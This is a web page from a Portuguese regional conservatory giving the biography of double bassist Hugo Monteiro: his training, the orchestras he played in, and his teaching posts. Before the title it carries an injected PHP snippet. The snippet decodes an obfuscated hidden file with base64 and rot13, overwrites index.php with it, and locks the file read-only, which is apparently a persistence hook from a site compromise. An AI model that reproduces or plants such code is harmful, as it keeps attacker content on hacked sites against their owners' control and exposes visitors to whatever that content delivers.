$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Hugo Monteiro – Contrabaixo – Conservatório Regional do Baixo Alentejo

Hugo Monteiro – Contrabaixo

Hugo André Tiago Monteiro nasceu a 13 de novembro de 1981 na Covilhã, Portugal. Iniciou os seus estudos musicais na Academia de Música e Dança do Fundão com Carlos Branco.   

Em 1998 ingressa na Escola Profissional de Artes da Beira Interior onde estudou inicialmente com João Fortunato Panta Nunes, e posteriormente com Miguel Leiria Pereira. Frequentou Masterclasses com Rinat Imbraguimov, Rainer Zepperitz e Fernando Flores. Terminou o Curso de Instrumento em 2002.  

Ao longo destes anos teve a oportunidade de integrar várias orquestras, como por exemplo, Orquestra APROARTE (2000), Orquestra Portuguesa das Escolas de Música (2000), International Orchestra of Luxembourg (1999 a 2001), ERASMUS String Orchestra (2004), Orquestra da ESART, Orquestra de Jovens de Santa Maria da Feira, Orquestra Sinfónica da E.P.A.B.I. e Orquestra da Universidade de Évora, e apresentou-se também como reforço na Orquestra do Algarve e Orquestra Filarmonia das Beiras.   

Tocou sob a direção dos maestros Oliver Diaz Suarez, Christopher Bochmann, Max Rabinovitsj, Gerard Doherty, Álvaro Cassuto, Osvaldo Ferreira, Richard Hortien e Arnold Allum, acompanhou solistas como António Rosado, Alex Klein, Stefan Dohr, Nina Schumann, Bruno Pasquier, Reinhold Friedrich, Jacques Mauger, e trabalhou com vários professores, em música de câmara e classe de naipe, entre os quais se destaca Elisabeth Perry, Alexandre Samardjiev, Duncan Fox e Miguel Rocha, entre outros.  

Em 2007 conclui a Licenciatura em Música – Ramo de Ensino, Área de Formação Específica de Canto e Instrumento – Instrumento Principal: Contrabaixo (com profissionalização), na Universidade de Évora, onde estudou com o professor Iouri Axenov. Ainda em 2007 orientou o naipe de Contrabaixos no estágio da Orquestra de Jovens Momentum Perpetuum, que decorreu na Casa da Música, Porto.  

É membro fundador do Ensemble Contemporaneus e da Orquestra do Alentejo.   

É professor de Contrabaixo no Conservatório Regional do Baixo Alentejo e Conservatório Regional de Évora “Eboræ Mvsica”.

Leave a Reply

Your email address will not be published.